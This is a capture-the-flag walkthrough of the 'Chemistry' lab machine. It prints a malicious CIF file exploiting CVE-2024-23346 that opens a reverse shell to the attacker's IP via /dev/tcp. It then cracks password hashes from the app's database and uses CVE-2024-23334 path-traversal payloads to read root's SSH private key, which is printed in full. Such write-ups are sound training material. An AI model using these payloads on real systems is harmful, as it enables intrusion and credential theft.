Chemistry

Synopsis

Chemistry is a easy linux machine created by FisMatHack. The pymatgen was used for analyzing cif file and is vulnerable to CVE-2024-23346, which gives us the app user shell. The database.db file contains username and hashes. Cracking them gives us the rosa shell. The port 8080 website is using aiohttp server which is vulnerable to CVE-2024-23334 LFI exploit and the id_rsa file is fetched using the LFI and root shell is gained.

OS	Difficulty	Points	Release Date	Retired Date
Linux	Easy	20	19-10-2024	08-03-2025

---

Enumeration

Nmap

Starting the nmap scan and found ssh and http services running.

nmap -Pn -sC -sV --min-rate=1000 10.10.11.38
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-28 11:13 GMT
Nmap scan report for 10.10.11.38
Host is up (0.65s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_  256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open  http    Werkzeug httpd 3.0.3 (Python 3.9.5)
|_http-title: Chemistry - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.43 seconds

Web - chemistry.htb [ Port 5000 ]

The website provides the service to analyze the CIF [ Crystallographic Information File ].

Registering will give us access to the dashboard where it has a input field to add the CIF file.

It is also providing the example file of .cif file. Downloading and uploading it gives us the below result.

example.cif

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

---

Foothold

Shell - app [ CVE-2024-23346 Exploit ]

Searching the vulnerability for cif file leads us to CVE-2024-23346 arbitrary code execution vulnerability. The PoC is release on github security where cif file is analyzedusing pymatgen, which is used for arbitrary code execution.

1

Create the malicious cif file

vuln.cif

data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c 'sh -i >& /dev/tcp/10.10.16.19/8443 0>&1'");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

2

Open the nc listener and upload the file

nc -lvnp 8443

3

Getting shell as app

Click on View button and we get the reverse shell as app user.

nc -lvnp 8443                               
Listening on 0.0.0.0 8443
Connection received on 10.10.11.38 50872
sh: 0: can't access tty; job control turned off
$ whoami
app
$ 

---

Privilege Escalation

Pillaging - app [ user ]

The instance directory is present in the users home directory which contains the database.db.

$ ls                                                                                                                                                                         
app.py                                                                                                                                                                       
instance                                                                                                                                                                     
static                                                                                                                                                                       
templates                                                                                                                                                                    
uploads                                                                                                                                                                      
$ cd instance                                                                                                                                                                
$ ls                                                                                                                                                                         
database.db                                                                                                                                                                  

Transfering the file using the python3 http server and wget to our system for enumeration.

$ which python3
/usr/bin/python3
$ python3 -m http.server

wget http://10.10.11.38:8000/database.db                                                                                                                                 
--2025-03-01 05:17:48--  http://10.10.11.38:8000/database.db                                                                                                                 
Connecting to 10.10.11.38:8000... connected.                                                                                                                                 
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/octet-stream]
Saving to: ‘database.db’

database.db                                 100%[========================================================================================>]  20.00K  16.2KB/s    in 1.2s    

2025-03-01 05:17:51 (16.2 KB/s) - ‘database.db’ saved [20480/20480]

Pillaging - database.db [ file ]

The database.db is a sqlite3 database and opening it with sqlitebrowser.

file database.db                                                                                                                                                         
database.db: SQLite 3.x database, last written using SQLite version 3031001, file counter 130, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 130  

sqlitebrowser database.db

The database contains the two tables structure and user. The user table contains the list of users and password which is hashed.

Shell - rosa

1

Importing the user table as .csv file

2

Filtering the username and hash for the file

awk 'NR > 1' user.csv > user.txt
awk -F ',' '{ print $2":"$3 }'  user.txt > hash

hash

admin:2861debaf8d99436a10ed6f75a252abf
app:197865e46b878d9e74a0346b6d59886a
rosa:63ed86ee9f624c7b14f1d4f43dc251a5
robert:02fcf7cfc10adc37959fb21f06c6b467
jobert:3dec299e06f7ed187bac06bd3b670ab2
carlos:9ad48828b0955513f7cf0f7f6510c8f8
peter:6845c17d298d95aa942127bdad2ceb9b
victoria:c3601ad2286a4293868ec2a4bc606ba3
tania:a4aa55e816205dc0389591c9f82f43bb
eusebio:6cad48078d0241cca9a7b322ecd073b3
gelacia:4af70c80b68267012ecdac9a7e916d18
fabian:4e5d71f53fdd2eabdbabb233113b5dc0
axel:9347f9724ca083b17e39555c36fd9007
kristel:6896ba7b11a62cacffbdaded457c6d92
test:cc03e747a6afbbcbf8be7668acfebee5
dexter:a125a6b2a71e23adc002ac7fbe1a1042
hi:49f68a5c8493ec2c0bf489821c21fc3b
lobotech:4599df31c8496e34dbe34c6615fc5991
lalala:9aa6e5f2256c17d2d430b100032b997c

3

Cracking the hash using hashcat

hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt --user
hashcat (v6.2.6) starting                                                                                                                                                    
                                                                                                                                                                             
OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]                                 
============================================================================================================================================                                 
* Device #1: cpu-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU                                                                    
                                                                                                                                                                             
Minimum password length supported by kernel: 0                                                                                                                               
Maximum password length supported by kernel: 256                                                                                                                             
                                                                                                                                                                             
Hashes: 19 digests; 19 unique digests, 1 unique salts                                                                                                                        
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates                                                                                                 
Rules: 1 
----- SNIP -----
Dictionary cache hit:                                                                                                                                                        
* Filename..: /usr/share/wordlists/rockyou.txt                                                                                                                               
* Passwords.: 14344385                                                                                                                                                       
* Bytes.....: 139921507                                                                                                                                                      
* Keyspace..: 14344385                                                                                                                                                       
                                                                                                                                                                             
a125a6b2a71e23adc002ac7fbe1a1042:dexter                                                                                                                                      
9aa6e5f2256c17d2d430b100032b997c:lalala                                                                                                                                      
9ad48828b0955513f7cf0f7f6510c8f8:carlos123                                                                                                                                   
cc03e747a6afbbcbf8be7668acfebee5:test123                                                                                                                                     
49f68a5c8493ec2c0bf489821c21fc3b:hi                                                                                                                                          
6845c17d298d95aa942127bdad2ceb9b:peterparker                                                                                                                                 
c3601ad2286a4293868ec2a4bc606ba3:victoria123                                                                                                                                 
63ed86ee9f624c7b14f1d4f43dc251a5:unicorniosrosados                                                                                                                           
Approaching final keyspace - workload adjusted.
----- SNIP -----
Started: Sat Mar  1 05:50:01 2025
Stopped: Sat Mar  1 05:50:34 2025  

Using the password unicorniosrosados we can ssh as rosa.

ssh rosa@10.10.11.38                                                                                                                                                     
rosa@10.10.11.38's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)                                                                                                           
                                                                                                                                                                             
 * Documentation:  https://help.ubuntu.com                                                                                                                                   
 * Management:     https://landscape.canonical.com                                                                                                                           
 * Support:        https://ubuntu.com/pro                                                                                                                                    
                                                                                                                                                                             
 System information as of Sat 01 Mar 2025 12:31:07 PM UTC                                                                                                                    

  System load:           0.0
  Usage of /:            84.6% of 5.08GB
  Memory usage:          35%
  Swap usage:            0%
  Processes:             260
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.38
  IPv6 address for eth0: dead:beef::250:56ff:feb9:7dee

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

9 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Mar  1 10:56:27 2025 from 10.10.14.84
rosa@chemistry:~$ 

The user.txt file contains the user flag 👏

Pillaging - rosa [ user ]

Running netstat reveals many open ports.

rosa@chemistry:~$ netstat -tlnp                                                                                                                                              
(Not all processes could be identified, non-owned process info                                                                                                               
 will not be shown, you would have to be root to see it all.)                                                                                                                
Active Internet connections (only servers)                                                                                                                                   
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name                                                                             
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                                                                                            
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                                                                                            
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                                                                                            
tcp        0      0 0.0.0.0:8000            0.0.0.0:*               LISTEN      -                                                                                            
tcp        0      0 0.0.0.0:5000            0.0.0.0:*               LISTEN      -                                                                                            
tcp        0      0 0.0.0.0:9001            0.0.0.0:*               LISTEN      -                                                                                            
tcp6       0      0 :::22                   :::*                    LISTEN      -  

Using curl in port 8080, the header shows the aiohttp/3.9.1.

rosa@chemistry:~$ curl -I http://localhost:8080
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5971
Date: Sat, 01 Mar 2025 12:45:21 GMT
Server: Python/3.9 aiohttp/3.9.1

Shell - root [ CVE-2024-23334 exploit ]

The aiohttp 3.9.1 is vulnerable to CVE-2024-23334 LFI and wizarddos has published the github repository which contains the PoC and script to exploit the vulnerability.

1

Git clone the repository

Git clone the repository in local machine because we cannot directly clone it into the rosa 's shell.

git clone https://github.com/wizarddos/CVE-2024-23334.git 
Cloning into 'CVE-2024-23334'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 12 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (12/12), 5.08 KiB | 1.27 MiB/s, done.
Resolving deltas: 100% (1/1), done.

Open the python http server and download it using wget.

python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

rosa@chemistry:~$ wget http://10.10.16.19:8000/CVE-2024-23334/exploit.py                                                                                                     
--2025-03-01 14:24:33--  http://10.10.16.19:8000/CVE-2024-23334/exploit.py                                                                                                   
Connecting to 10.10.16.19:8000... connected.                                                                                                                                 
HTTP request sent, awaiting response... 200 OK                                                                                                                               
Length: 1522 (1.5K) [text/x-python]                                                                                                                                          
Saving to: ‘exploit.py’                                                                                                                                                      

exploit.py                                  100%[========================================================================================>]   1.49K  2.80KB/s    in 0.5s    

2025-03-01 14:24:36 (2.80 KB/s) - ‘exploit.py’ saved [1522/1522]

2

Executing the script

Running the script to get the /root/.ssh/id_rsa file.

rosa@chemistry:~$ python3 exploit.py -u http://localhost:8080/assets -f /root/.ssh/id_rsa                                                                                    
[+] Attempt 0                                                                                                                                                                
                    Payload: /static/../root/.ssh/id_rsa                                                                                                                     
                                                                                                                                                                             
                    Status code: 404                                                                                                                                         
[+] Attempt 1                                                                                                                                                                
                    Payload: /static/../../root/.ssh/id_rsa                                                                                                                  
                                                                                                                                                                             
                    Status code: 404                                                                                                                                         
[+] Attempt 2                                                                                                                                                                
                    Payload: /static/../../../root/.ssh/id_rsa                                                                                                               
                                                                                                                                                                             
                    Status code: 404                                                                                                                                         
[+] Attempt 3                                                                                                                                                                
                    Payload: /static/../../../../root/.ssh/id_rsa                                                                                                            
                                                                                                                                                                             
                    Status code: 200                                                                                                                                         
Respose:                   
-----BEGIN OPENSSH PRIVATE KEY-----                                                                                                                                          
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn                                                                                                       
NhAAAAAwEAAQAAAYEAsFbYzGxskgZ6YM1LOUJsjU66WHi8Y2ZFQcM3G8VjO+NHKK8P0hIU                                                                                                       
UbnmTGaPeW4evLeehnYFQleaC9u//vciBLNOWGqeg6Kjsq2lVRkAvwK2suJSTtVZ8qGi1v                                                                                                       
j0wO69QoWrHERaRqmTzranVyYAdTmiXlGqUyiy0I7GVYqhv/QC7jt6For4PMAjcT0ED3Gk                                                                                                       
HVJONbz2eav5aFJcOvsCG1aC93Le5R43Wgwo7kHPlfM5DjSDRqmBxZpaLpWK3HwCKYITbo                                                                                                       
DfYsOMY0zyI0k5yLl1s685qJIYJHmin9HZBmDIwS7e2riTHhNbt2naHxd0WkJ8PUTgXuV2                                                                                                       
UOljWP/TVPTkM5byav5bzhIwxhtdTy02DWjqFQn2kaQ8xe9X+Ymrf2wK8C4ezAycvlf3Iv                                                                                                       
ATj++Xrpmmh9uR1HdS1XvD7glEFqNbYo3Q/OhiMto1JFqgWugeHm715yDnB3A+og4SFzrE                                                                                                       
vrLegAOwvNlDYGjJWnTqEmUDk9ruO4Eq4ad1TYMbAAAFiPikP5X4pD+VAAAAB3NzaC1yc2                                                                                                       
EAAAGBALBW2MxsbJIGemDNSzlCbI1Oulh4vGNmRUHDNxvFYzvjRyivD9ISFFG55kxmj3lu                                                                                                       
Hry3noZ2BUJXmgvbv/73IgSzTlhqnoOio7KtpVUZAL8CtrLiUk7VWfKhotb49MDuvUKFqx                                                                                                       
xEWkapk862p1cmAHU5ol5RqlMostCOxlWKob/0Au47ehaK+DzAI3E9BA9xpB1STjW89nmr                                                                                                       
+WhSXDr7AhtWgvdy3uUeN1oMKO5Bz5XzOQ40g0apgcWaWi6Vitx8AimCE26A32LDjGNM8i                                                                                                       
NJOci5dbOvOaiSGCR5op/R2QZgyMEu3tq4kx4TW7dp2h8XdFpCfD1E4F7ldlDpY1j/01T0                                                                                                       
5DOW8mr+W84SMMYbXU8tNg1o6hUJ9pGkPMXvV/mJq39sCvAuHswMnL5X9yLwE4/vl66Zpo                                                                                                       
fbkdR3UtV7w+4JRBajW2KN0PzoYjLaNSRaoFroHh5u9ecg5wdwPqIOEhc6xL6y3oADsLzZ                                                                                                       
Q2BoyVp06hJlA5Pa7juBKuGndU2DGwAAAAMBAAEAAAGBAJikdMJv0IOO6/xDeSw1nXWsgo                                                                                                       
325Uw9yRGmBFwbv0yl7oD/GPjFAaXE/99+oA+DDURaxfSq0N6eqhA9xrLUBjR/agALOu/D
p2QSAB3rqMOve6rZUlo/QL9Qv37KvkML5fRhdL7hRCwKupGjdrNvh9Hxc+WlV4Too/D4xi
JiAKYCeU7zWTmOTld4ErYBFTSxMFjZWC4YRlsITLrLIF9FzIsRlgjQ/LTkNRHTmNK1URYC
Fo9/UWuna1g7xniwpiU5icwm3Ru4nGtVQnrAMszn10E3kPfjvN2DFV18+pmkbNu2RKy5mJ
XpfF5LCPip69nDbDRbF22stGpSJ5mkRXUjvXh1J1R1HQ5pns38TGpPv9Pidom2QTpjdiev
dUmez+ByylZZd2p7wdS7pzexzG0SkmlleZRMVjobauYmCZLIT3coK4g9YGlBHkc0Ck6mBU
HvwJLAaodQ9Ts9m8i4yrwltLwVI/l+TtaVi3qBDf4ZtIdMKZU3hex+MlEG74f4j5BlUQAA
AMB6voaH6wysSWeG55LhaBSpnlZrOq7RiGbGIe0qFg+1S2JfesHGcBTAr6J4PLzfFXfijz
syGiF0HQDvl+gYVCHwOkTEjvGV2pSkhFEjgQXizB9EXXWsG1xZ3QzVq95HmKXSJoiw2b+E
9F6ERvw84P6Opf5X5fky87eMcOpzrRgLXeCCz0geeqSa/tZU0xyM1JM/eGjP4DNbGTpGv4
PT9QDq+ykeDuqLZkFhgMped056cNwOdNmpkWRIck9ybJMvEA8AAADBAOlEI0l2rKDuUXMt
XW1S6DnV8OFwMHlf6kcjVFQXmwpFeLTtp0OtbIeo7h7axzzcRC1X/J/N+j7p0JTN6FjpI6
yFFpg+LxkZv2FkqKBH0ntky8F/UprfY2B9rxYGfbblS7yU6xoFC2VjUH8ZcP5+blXcBOhF
hiv6BSogWZ7QNAyD7OhWhOcPNBfk3YFvbg6hawQH2c0pBTWtIWTTUBtOpdta0hU4SZ6uvj
71odqvPNiX+2Hc/k/aqTR8xRMHhwPxxwAAAMEAwYZp7+2BqjA21NrrTXvGCq8N8ZZsbc3Z
2vrhTfqruw6TjUvC/t6FEs3H6Zw4npl+It13kfc6WkGVhsTaAJj/lZSLtN42PXBXwzThjH
giZfQtMfGAqJkPIUbp2QKKY/y6MENIk5pwo2KfJYI/pH0zM9l94eRYyqGHdbWj4GPD8NRK
OlOfMO4xkLwj4rPIcqbGzi0Ant/O+V7NRN/mtx7xDL7oBwhpRDE1Bn4ILcsneX5YH/XoBh
1arrDbm+uzE+QNAAAADnJvb3RAY2hlbWlzdHJ5AQIDBA==
-----END OPENSSH PRIVATE KEY-----

Exploit complete
rosa@chemistry:~$ 

3

Getting the root shell

Copy and paste the id_rsa into local machine file, remove the extra space from the private key because it will give the libcrypto error and change the permissions.

chmod 600 id_rsa

ssh -i id_rsa root@10.10.11.38
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat 01 Mar 2025 02:52:03 PM UTC

  System load:           0.0
  Usage of /:            72.8% of 5.08GB
  Memory usage:          22%
  Swap usage:            0%
  Processes:             234
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.38
  IPv6 address for eth0: dead:beef::250:56ff:feb9:3907


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

9 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Oct 11 14:06:59 2024
root@chemistry:~# 

The root.txt file contains the root flag 🎉

Proof of Concept

The below video provides the PoC of Chemistry machine.